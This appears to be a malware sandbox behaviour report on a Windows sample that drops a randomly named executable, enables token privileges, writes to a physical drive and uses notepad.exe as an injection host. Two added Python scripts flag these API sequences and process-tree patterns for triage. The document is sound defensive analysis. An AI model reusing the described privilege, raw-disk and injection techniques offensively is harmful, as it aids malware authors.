Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 27_2_00094C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 27_2_0009A550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 29_2_005D4C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 29_2_005DA550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 30_2_00094C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 30_2_0009A550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 31_2_00914C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 31_2_0091A550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 32_2_00394C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 32_2_0039A550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 33_2_00094C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 33_2_0009A550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 34_2_00224C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 34_2_0022A550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 35_2_00154C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 35_2_0015A550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 36_2_007F4C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 36_2_007FA550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 37_2_00254C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 37_2_0025A550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 38_2_00264C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 38_2_0026A550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 39_2_003F4C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 39_2_003FA550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 40_2_003F4C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 40_2_003FA550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 41_2_00284C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 41_2_0028A550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 42_2_00104C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 42_2_0010A550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 0_2_00605F28 GetDiskFreeSpaceA
Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 4_2_0036EE40 CoCreateInstance,memset,lstrcpyA,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,memset,SHGetFileInfoA,memset,lstrcpyA,lstrcatA,MultiByteToWideChar
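The "Code function" rows above list, per function, the Win32 APIs it calls in order. Two sequences matter for triage: OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges is how a process enables a privilege in its own token before reaching into other processes (the report does not show which privilege name is passed, so do not assume SeDebugPrivilege from these rows alone), and WriteFile followed by DeviceIoControl in 4_2_00369E7B is the pattern behind the PhysicalDrive signature. The same two functions recur in every instance of the dropped QgGhoOpxHPl.exe (processes 9 through 42) at addresses that differ only in the upper bytes, i.e. identical code rebased per process. The script below is an added example, not part of the Joe Sandbox report or of the sample: it parses rows in this layout (constructed sample rows embedded, a subset of the ones above) and flags ordered API subsequences. The signature labels are the example's own, not Joe Sandbox signature names.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample rows (not the full report) in the layout of the "Code function"
# entries: a Joe Sandbox function id (<pid>_<round>_<address>) followed by the
# Win32 APIs the function calls, in call order. The last row lists no APIs.
SAMPLE_ROWS = [
    r"Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 4_2_00369E7B WriteFile,DeviceIoControl",
    r"Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 4_2_00364C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle",
    r"Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 4_2_0036A550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError",
    r"Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 4_2_0036EE40 CoCreateInstance,memset,lstrcpyA,lstrcatA,SHGetFileInfoA,MultiByteToWideChar",
    r"Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 4_2_00362D60",
]

# Ordered API subsequences worth a closer look (gaps between the APIs are allowed).
# The labels are this example's own, not Joe Sandbox signature names.
SIGNATURES: Dict[str, Tuple[str, ...]] = {
    # enabling a privilege in the caller's own token; the report does not show
    # which privilege name is looked up, so the rule keys on the API order only
    "token-privilege-enable": ("OpenProcessToken", "LookupPrivilegeValue", "AdjustTokenPrivileges"),
    # writing to a handle and then issuing an IOCTL on it: consistent with raw
    # device access such as a \\.\PhysicalDrive write
    "write-then-ioctl": ("WriteFile", "DeviceIoControl"),
}

FUNC_ID = re.compile(r"\d+_\d+_[0-9A-Fa-f]{8}")
ROW = re.compile(r"Code function:\s*(\d+_\d+_[0-9A-Fa-f]{8})[:\s]*(.*)$")


def normalise(api: str) -> str:
    """Fold the ANSI/Unicode suffix so LookupPrivilegeValueA and ...W both match
    one pattern. Heuristic: strip a trailing A or W only when it follows a
    lowercase letter, which leaves names such as CloseHandle untouched."""
    if len(api) > 2 and api[-1] in "AW" and api[-2].islower():
        return api[:-1]
    return api


def parse_row(row: str) -> Tuple[str, List[str]]:
    """Return (function_id, [api, ...]) for one row. Tokens that look like a
    function id (the raw HTML export repeats the id after the API list) are dropped."""
    m = ROW.search(row)
    if not m:
        raise ValueError(f"not a Code function row: {row!r}")
    func_id, rest = m.group(1), m.group(2)
    apis: List[str] = []
    for token in rest.split(","):
        token = token.strip()
        if token and not FUNC_ID.fullmatch(token):
            apis.append(normalise(token))
    return func_id, apis


def contains_ordered(apis: List[str], pattern: Tuple[str, ...]) -> bool:
    """True when every API in `pattern` appears in `apis` in that order, gaps allowed."""
    it = iter(apis)
    return all(any(name == wanted for name in it) for wanted in pattern)


def scan(rows: List[str]) -> List[Tuple[str, str]]:
    """Return (function_id, signature_label) for every row matching a signature."""
    hits: List[Tuple[str, str]] = []
    for row in rows:
        func_id, apis = parse_row(row)
        for label, pattern in SIGNATURES.items():
            if contains_ordered(apis, pattern):
                hits.append((func_id, label))
    return hits


if __name__ == "__main__":
    for func_id, label in scan(SAMPLE_ROWS):
        print(f"{func_id}: {label}")
```

The parser also accepts the raw export form, where the function id is repeated after the API list and the id of an API-less function runs straight into its own duplicate; both are common when a report is copied out of the HTML. Matching by ordered subsequence rather than exact list keeps the rule stable across the two variants of the privilege routine (with and without the GetLastError/CloseHandle calls) seen in the rows above.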
Source: C:\Program Files\Internet Explorer\iexplore.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\History\Low
Source: C:\Users\user\Desktop\25F.tmp.exe | Mutant created: \Sessions\1\BaseNamedObjects\-d1ff3a37Mutex
Source: C:\Program Files\Internet Explorer\iexplore.exe | File created: C:\Users\user\AppData\Local\Temp\~DF3A6EF28F490D6D3E.TMP
Source: C:\Users\user\Desktop\25F.tmp.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\25F.tmp.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\25F.tmp.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\25F.tmp.exe | File read: C:\Users\user\Desktop\25F.tmp.exe
Source: unknown | Process created: C:\Users\user\Desktop\25F.tmp.exe "C:\Users\user\Desktop\25F.tmp.exe"
Source: C:\Users\user\Desktop\25F.tmp.exe | Process created: C:\Users\user\Desktop\25F.tmp.exe C:\Users\user\Desktop\25F.tmp.exe
Source: C:\Users\user\Desktop\25F.tmp.exe | Process created: C:\Windows\notepad.exe "C:\Windows\notepad.exe"
Source: C:\Users\user\Desktop\25F.tmp.exe | Process created: C:\Users\user\Desktop\25F.tmp.exe C:\Users\user\Desktop\25F.tmp.exe
Source: C:\Users\user\Desktop\25F.tmp.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Process created: C:\Program Files\Internet Explorer\iexplore.exe "C:\Program Files\Internet Explorer\IEXPLORE.EXE"
Source: C:\Program Files\Internet Explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3408 CREDAT:275457 /prefetch:2
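The "Process created" rows give the process tree: the sample re-launches itself twice, starts notepad.exe with no arguments (a quiet host consistent with the "Injects a PE file into a foreign processes" and "Creates a thread in another existing process" signatures), and starts the 32-bit iexplore.exe, which brings up the 64-bit frame process, which in turn launches a 32-bit content process (the SCODEF/CREDAT arguments). The rows carry no PIDs, so a tree rebuilt from them is keyed by image path and cannot separate the two self-spawned instances. The script below is an added example, not part of the report: it parses rows in this layout (constructed sample rows embedded, in the "Source | Process created" form), renders the tree and applies two hypothetical triage rules; the rule names and directory prefixes are the example's own.

```python
import re
from collections import defaultdict
from typing import Dict, List, Tuple

# Constructed sample rows (not the full report) in the layout of the "Process created"
# entries: creating image, created image, created command line. The rows carry no
# PIDs, so the tree below is keyed by image path.
SAMPLE_ROWS = [
    r'Source: unknown | Process created: C:\Users\user\Desktop\25F.tmp.exe "C:\Users\user\Desktop\25F.tmp.exe"',
    r'Source: C:\Users\user\Desktop\25F.tmp.exe | Process created: C:\Users\user\Desktop\25F.tmp.exe C:\Users\user\Desktop\25F.tmp.exe',
    r'Source: C:\Users\user\Desktop\25F.tmp.exe | Process created: C:\Windows\notepad.exe "C:\Windows\notepad.exe"',
    r'Source: C:\Users\user\Desktop\25F.tmp.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"',
    r'Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Process created: C:\Program Files\Internet Explorer\iexplore.exe "C:\Program Files\Internet Explorer\IEXPLORE.EXE"',
    r'Source: C:\Program Files\Internet Explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3408 CREDAT:275457 /prefetch:2',
]

# Also tolerates the raw export, where the source path runs straight into
# "Process created:" and a trailing "Jump to behavior" link is appended.
ROW = re.compile(
    r"^Source:\s*(?P<parent>.+?)\s*\|?\s*Process created:\s*(?P<child>.+?\.exe)\s*"
    r"(?P<cmdline>.*?)\s*(?:Jump to behavior)?$",
    re.IGNORECASE,
)

Edge = Tuple[str, str, str]  # (parent image, child image, child command line)

USER_DIRS = ("c:\\users\\",)                         # example's own prefix lists
SYSTEM_DIRS = ("c:\\windows\\", "c:\\program files")


def parse_rows(rows: List[str]) -> List[Edge]:
    """Parse every row into a (parent, child, cmdline) edge."""
    edges: List[Edge] = []
    for row in rows:
        m = ROW.match(row.strip())
        if not m:
            raise ValueError(f"not a Process created row: {row!r}")
        edges.append((m["parent"], m["child"], m["cmdline"]))
    return edges


def args_of(child: str, cmdline: str) -> str:
    """Return the command line with its leading program path removed, quoted or not."""
    cl = cmdline.strip()
    if cl.startswith('"'):
        end = cl.find('"', 1)
        return cl[end + 1:].strip() if end != -1 else ""
    if cl.lower().startswith(child.lower()):  # unquoted path that may contain spaces
        return cl[len(child):].strip()
    return cl.split(" ", 1)[1].strip() if " " in cl else ""


def _under(path: str, prefixes: Tuple[str, ...]) -> bool:
    return path.lower().startswith(prefixes)


def findings(edges: List[Edge]) -> List[Tuple[str, str, str]]:
    """Two hypothetical rules, returned as (rule, parent, child): an image that
    re-launches itself, and a Windows/Program Files binary started with no
    arguments by an image under C:\\Users (a quiet host for code injection)."""
    out: List[Tuple[str, str, str]] = []
    for parent, child, cmdline in edges:
        if parent.lower() == child.lower():
            out.append(("self-respawn", parent, child))
        if _under(parent, USER_DIRS) and _under(child, SYSTEM_DIRS) and not args_of(child, cmdline):
            out.append(("system-binary-started-without-arguments", parent, child))
    return out


def render_tree(edges: List[Edge]) -> List[str]:
    """Indented tree keyed by image path. Self-respawn edges are skipped here
    (they would form a cycle) and an image already on the current path is shown
    but not expanded, so the IE x86 -> x64 -> x86 chain terminates."""
    children: Dict[str, List[Tuple[str, str]]] = defaultdict(list)
    child_set = set()
    for parent, child, cmdline in edges:
        if parent.lower() == child.lower():
            continue
        children[parent].append((child, cmdline))
        child_set.add(child)
    lines: List[str] = []

    def walk(node: str, depth: int, path: frozenset) -> None:
        for child, cmdline in children.get(node, []):
            lines.append("  " * depth + f"{child}  [{args_of(child, cmdline) or '<no args>'}]")
            if child not in path:
                walk(child, depth + 1, path | {child})

    for root in [p for p in children if p not in child_set]:
        lines.append(root)
        walk(root, 1, frozenset({root}))
    return lines


if __name__ == "__main__":
    edges = parse_rows(SAMPLE_ROWS)
    print("\n".join(render_tree(edges)))
    for rule, parent, child in findings(edges):
        print(f"{rule}: {parent} -> {child}")
```

Run on the sample rows, the tree has one root ("unknown", the sandbox's launcher), the no-argument rule fires for both notepad.exe and the first iexplore.exe, and the self-respawn rule fires for the 25F.tmp.exe edge; the IE frame and content processes are left alone because their parent is not under C:\Users. On a real host the rule would be keyed by PID and parent PID from the process-creation telemetry rather than by image path.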
Source: C:\Users\user\Desktop\25F.tmp.exe | Section loaded: wow64win.dll
Source: C:\Users\user\Desktop\25F.tmp.exe | Section loaded: wow64cpu.dll
Source: C:\Users\user\Desktop\25F.tmp.exe | Section loaded: wow64win.dll
Source: C:\Users\user\Desktop\25F.tmp.exe | Section loaded: wow64cpu.dll
Source: C:\Users\user\Desktop\25F.tmp.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\25F.tmp.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\25F.tmp.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\25F.tmp.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\25F.tmp.exe | Section loaded: cryptsp.dll
Source: C:\Windows\notepad.exe | Section loaded: version.dll
Source: C:\Windows\notepad.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\25F.tmp.exe | Section loaded: wow64win.dll
Source: C:\Users\user\Desktop\25F.tmp.exe | Section loaded: wow64cpu.dll
Source: C:\Users\user\Desktop\25F.tmp.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\25F.tmp.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\25F.tmp.exe | Section loaded: version.dll
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Section loaded: secur32.dll
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Section loaded: version.dll
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Section loaded: secur32.dll
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Section loaded: version.dll
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Section loaded: secur32.dll
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Section loaded: version.dll
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Section loaded: secur32.dll
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Section loaded: version.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dllJump to behavior
